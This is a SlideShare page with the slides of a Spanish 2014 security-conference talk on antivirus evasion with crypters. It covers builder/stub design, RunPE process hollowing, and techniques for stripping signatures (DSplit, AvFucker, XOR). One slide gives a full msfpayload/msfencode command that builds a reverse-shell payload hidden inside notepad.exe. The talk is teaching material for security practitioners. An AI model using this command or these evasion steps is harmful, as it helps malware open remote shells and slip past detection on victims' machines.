Successfully reported this slideshow.
We use your LinkedIn profile and activity data to personalize ads and to show you more relevant ads. You can change your ad preferences anytime.

Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar

1,360 views

Published on

Charla en MundoHackerDay sobre técnicas de evasión de AntiVirus y uso de Crypters.

Published in: Technology
  • Be the first to comment

  • Be the first to like this

Evasion_AVs_Uso_de_Crypters-MundoHackerDay_2k14_apasamar

  1. 1. Evasión de Anti-Virus: Uso de Crypters Abraham Pasamar - INCIDE - #mundohackerday - 29.04.14
  2. 2. Whoami ncd:~ apasamar$ whoami apasamar apasamar@incide.es @apasamar a.k.a brajan ncd:~ apasamar$ cat apasamar.cv Ingeniero superior y Máster en seguridad de la información Socio fundador de INCIDE: Expertos en prueba electrónica Forensics / Periciales Respuesta a incidentes Consultoría/Auditoría de Seguridad ! ncd:~ apasamar$ rm apasamar.cv
  3. 3. de qué va esto... • Introducción • AV’s como funcionan • Tipos de malware y detección AV’s • Medidas de evasión • Auto-cifrado, Polimorfismo, Ofuscación, Compresión • Crypters • tipos y funcionamiento • stub • stub FUD • técnicas Modding • Recursos
  4. 4. introducción • MALWARE = $$$$$$$$$ • BOTNETS, APT, RANSOMWARE • Empresas AV’s —> Detectar MALWARE • Malos: INDETECTAR MALWARE
  5. 5. introducción • MALWARE = $$$$$$$$$ • BOTNETS, APT, RANSOMWARE • Empresas AV’s —> Detectar MALWARE • Malos: INDETECTAR MALWARE
  6. 6. introducción Objetivo de los Malos:
  7. 7. introducción Objetivo de los Malos:
  8. 8. AV’s howto • Los AntiVirus escanean binarios EN DISCO • NO analizan la memoria, sino los binarios en disco que arrancan procesos • Buscan firmas: cadenas binarias (BBDD) • Buscan elementos/técnicas maliciosas (Heurística):APIS, funciones, XOR, etc • Sandbox (ejecución parcial): búsqueda de técnicas de descifrado, etc
  9. 9. AV’s howto EJECUTABLE DISCO RAM PROCESO ? SCAN ? AV
  10. 10. AV’s howto • Proceso análisis de los AV’s: Ataques
  11. 11. AV’s howto • Recomendado: “Abusing File Processing in Malware Detectors for Fun and Profit” (2012) Suman Jana and Vitaly Shmatikov The University of Texas at Austin
  12. 12. AV’s howto • Metasploit Framework (Rapid7) • Community Edition: • msfpayload windows/shell/ reverse_tcp LHOST=192.168.1.75 LPORT=4444 R | msfencode -c 5 -e x86/shikata_ga_nai -x notepad.exe > notepad2.exe • Pro Edition: • Generate AV-evading Dynamic Payloads
  13. 13. tipos de malware y detección AV’s • Programas espía comerciales: (white list, firmados) • e-blaster • 007 • perfect keylogger
  14. 14. • Malware recién creado: • detección baja (sin firmas) • posible detección heurística tipos de malware y detección AV’s
  15. 15. • Malware existente: (muy conocidos, firmas y heurística) • troyanos • downloaders • stealers • reverse shells • ... tipos de malware y detección AV’s
  16. 16. ¿cómo se puede indetectar el malware ya detectado ? • C r y p t e r s: • Software que permite cifrar CUALQUIER MALWARE para hacerlo indetectable a los antivirus. • La rutina de descifrado tiene que poder ejecutarse (no se cifra)
  17. 17. crypters
  18. 18. builder / stub • Builder: • Encargado de crear el ejecutable compuesto por el STUB y el MALWARE CIFRADO • Stub: • Encargado de descifrar el MALWARE CIFRADO y ejecutarlo
  19. 19. ! ! ! ! ! ! ! ! ! CRYPTER + STUB STUB MALWARE DETECTADO MALWARE CIFRADO STUB CRYPTER (Builder) XOR, RC4, ... exe dll recurso builder / stub
  20. 20. STUB MALWARE CIFRADO STUB MALWARE CIFRADOKEY Separador Separador También se puede usar un recurso builder / stub
  21. 21. • Tipos de crypters: • ScanTime • RunTime builder / stub
  22. 22. • ScanTime STUB MALWARE CIFRADO MALWARE DETECTADO DISCO AV stub
  23. 23. • RunTime STUB MALWARE CIFRADO DISCO RAM MALWAREDETECTADO AV stub
  24. 24. • Componentes STUB: • Rutina Decrypt • RunPe ! stub
  25. 25. RunPE o Dynamic Forking CreateProcess PROCESO 1 (CREATE_SUSPENDED) GetThreadContext PEB EBX EAX BaseAddress 1 EP I +8 PROCESO 2 ReadFile WriteProcessMemoryEP 2 BaseAddress 2 SetThreadContextResumeThread
  26. 26. FUD • Objetivo: Stub FUD (Full UnDetectable) • Indetección desde Fuente (Source) • Indetección desde Binario • ¿Cómo? • MODDING
  27. 27. modding source • A mano o con ofuscadores: • Reemplazar funciones (SPLIT,..) • Reemplazar y/o ofuscar funciones/strings/variables y Cifrar con rot13 o Hex • Cifrados: RC4 y XOR quemadas • Alternativas:TEA, DES, etc • RunPE alternativos • APIs Falsas • TLB (Tab Library File) • Trash code
  28. 28. modding binario • Indetección desde Binario: • Se utilizan diferentes técnicas como: • Dsplit/AvFucker • SignatureFucker • Hexing • RIT • XOR y variantes • Tips
  29. 29. • Se modea el STUB, el BUILDER no es parte del malware in the wild • Se buscan las FIRMAS o puntos de detección • Firmas sencillas • Firmas Múltiples • Heurística modding binario
  30. 30. AV’s howto • Recomendado: “Bypassing Anti-Virus Scanners” (2012) InterNOT Security Team
  31. 31. • ¿Rutina CIFRADO/DESCIFRADO dentro del STUB? stub.exe EP Firmas stub.exe OLD EP Firmas NEW EP CIFRADO Descifrado modding binario
  32. 32. • SCAN DEL STUB ORIGINAL modding binario
  33. 33. • RUTINA DE CIFRADO • NEW EP • INSERTAR RUTINA • .text SECTION • desde 1050 • hasta import table modding binario
  34. 34. • RUTINA CIFRADO EN NEW EP modding binario
  35. 35. • RUTINA DESCIFRADOY EJECUCIÓN EN NEW EP modding binario
  36. 36. • SCAN DEL STUB MODIFICADO modding binario 16 AV’s KO
  37. 37. • TÉCNICAS: • Dsplit/AvFucker • SignatureFucker • Hexing • RIT • XOR y variantes • Tips modding binario
  38. 38. • Técnica DSplit: Cabecera Cuerpo EXE Cabecera Cuerpo EXE 1000 bytes Cabecera Cuerpo EXE 2000 bytes Cabecera Cuerpo EXE 3000 bytes Cabecera Cuerpo EXE ··· Nx1000 bytes modding binario
  39. 39. • Técnica AvFucker: Cabecera Cuerpo EXE Cuerpo EXECabecera 0000000000 1000 bytes Cabecera Cuerpo EXE0000000000 1000 bytes Cabecera Cuerpo EXE0000000000 1000 bytes Cabecera Cuerpo EXE ··· 0000000000 1000 bytes modding binario
  40. 40. • Técnica RIT • localizar firma • si son instrucciones partir flujo • saltar a otro punto (hueco) • finalizar las instrucciones • retornar al punto posterior ! modding binario
  41. 41. • Técnica XOR • localizar firma/s • aplicar XOR con un valor p.e. 22 • Modificar EP o saltar a un hueco • aplicar XOR 22 • retornar al punto posterior ! modding binario
  42. 42. Detectado (EP): XOR de los bytes detectados: Nuevo EP ( Instruccione XOR reverso): modding binario
  43. 43. otras técnicas • Añadir APIs Falsas • Edición Hexadecimal de cadenas • Mover/cambiar direcciones de llamadas a las funciones • Cambiar llamadas por nombre/offeset • Introducir en STUB la función de la DLL detectada !
  44. 44. recursos • http://www.indetectables.net • http://www.udtools.net • http://www.masters-hackers.info • http://www.level-23.biz/ • http://www.corp-51.net/ • http://www.underc0de.org !
  45. 45. Avda. Diagonal, 640 6ª Planta 08017 Barcelona info@incide.es http://www.incide.es http://www.twitter.com/1NC1D3 http://www.atrapadosporlosbits.com http://www.youtube.com/incidetube Companies > INCIDE - Investigación Digital Tel./Fax. +34 932 546 277 / +34 932 546 314 ¿ P R E G U N T A S ?

×